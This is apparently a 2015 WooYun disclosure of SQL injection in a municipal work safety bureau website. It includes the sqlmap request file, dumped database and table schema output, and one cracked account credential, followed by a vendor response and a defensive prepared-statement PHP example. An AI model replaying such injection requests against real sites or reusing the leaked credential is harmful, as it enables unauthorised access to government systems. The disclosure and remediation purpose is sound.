
Vulnerability summary

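Bug ID: wooyun-2015-0137732

Title: SQL injection vulnerability in a municipal Work Safety Supervision and Administration Bureau

Related vendor: cncert (National Internet Emergency Center)

Author: qglfnt

Submitted: 2015-09-02 20:08

Fixed: 2015-10-20 08:40

Publicly disclosed: 2015-10-20 08:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]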


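Vulnerability details

Disclosure status:

2015-09-02: Details reported to the vendor; awaiting vendor handling
2015-09-05: cncert (National Internet Emergency Center) has not yet been able to contact the organization concerned; details are disclosed only to the notifying body
2015-09-15: Details disclosed to core white hats and experts in related fields
2015-09-25: Details disclosed to regular white hats
2015-10-05: Details disclosed to trainee white hats
2015-10-20: Details disclosed to the public

Brief description:

RT

Detailed description:

Injection request (run as sqlmap -r 1.txt):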

GET http://**.**.**.**/count.php?aid=1&v=2 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/bencandy.php?fid=24&id=411
Cookie: safedog-flow-item=C0519CA4971AEC40DBE3AD4F6135C8EA; USR=p9qlbuap%090%091440774349%09http%3A%2F%2F**.**.**.**%2Fbencandy.php%3Ffid%3D24%26id%3D411
Connection: keep-alive

Proof of vulnerability:

Database

[Screenshot: 20150829000215.png]


Tables

Database: kmsafety                                                             
[76 tables]


Columns

Database: kmsafety                                                             
Table: qb_members
[3 columns]
+----------+-----------------------+
| Column | Type |
+----------+-----------------------+
| password | varchar(32) |
| uid | mediumint(7) unsigned |
| username | varchar(30) |
+----------+-----------------------+


Column contents (account information)

Database: kmsafety
Table: qb_members
[16 entries]


The password of one of the accounts was cracked:
zhoutiao/zhoutiao123

Remediation:

Filter the parameters

Copyright notice: when reposting, please credit the source qglfnt@乌云 (WooYun)
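
The remediation above says only to filter the parameters. One way to do that for numeric parameters such as aid and v, as an added example that is not the site's code: validate each value as a positive integer and pass it to a prepared statement. The table hit_count, its columns and the function names are hypothetical, in-memory SQLite stands in for the site's database, and PHP 8 with pdo_sqlite is assumed.

```php
<?php
declare(strict_types=1);
// Added example, not the site's code. Table hit_count and its columns are
// hypothetical; in-memory SQLite stands in for the site's database.

/** Accept only a positive integer; arrays, text and null yield null. */
function positiveInt(mixed $raw): ?int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

/** Handle count.php-style input; returns [HTTP status, hit count or null]. */
function recordHit(PDO $db, array $query): array
{
    $aid = positiveInt($query['aid'] ?? null);
    $v   = positiveInt($query['v'] ?? null);
    if ($aid === null || $v === null) {
        return [400, null];            // rejected before any SQL is prepared
    }
    // Values are bound as parameters, never concatenated into the SQL text.
    $upd = $db->prepare('UPDATE hit_count SET hits = hits + 1 WHERE aid = :aid AND v = :v');
    $upd->execute([':aid' => $aid, ':v' => $v]);
    if ($upd->rowCount() === 0) {
        return [404, null];            // well-formed but unknown record
    }
    $sel = $db->prepare('SELECT hits FROM hit_count WHERE aid = :aid AND v = :v');
    $sel->execute([':aid' => $aid, ':v' => $v]);
    return [200, (int) $sel->fetchColumn()];
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE hit_count (aid INTEGER, v INTEGER, hits INTEGER)');
$db->exec('INSERT INTO hit_count VALUES (1, 2, 41)');

// Constructed inputs: the well-formed request from the report, then bad values.
$samples = [
    ['aid' => '1', 'v' => '2'],        // same parameter values as the report
    ['aid' => "1'", 'v' => '2'],       // stray quote
    ['aid' => '1abc', 'v' => '2'],     // trailing text after the number
    ['aid' => ['1'], 'v' => '2'],      // aid[]=1 arrives as an array
    ['aid' => '7', 'v' => '2'],        // valid integer, no matching row
];
foreach ($samples as $q) {
    [$status, $hits] = recordHit($db, $q);
    printf("%-28s -> %d %s\n", json_encode($q), $status, $hits ?? '-');
}
```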


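Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-05 08:38

Vendor reply:

CNVD confirmed and reproduced the situation described and has passed it to CNCERT for delivery to the Yunnan sub-center, which will follow up and coordinate with the organization that manages the website.

Latest status:

None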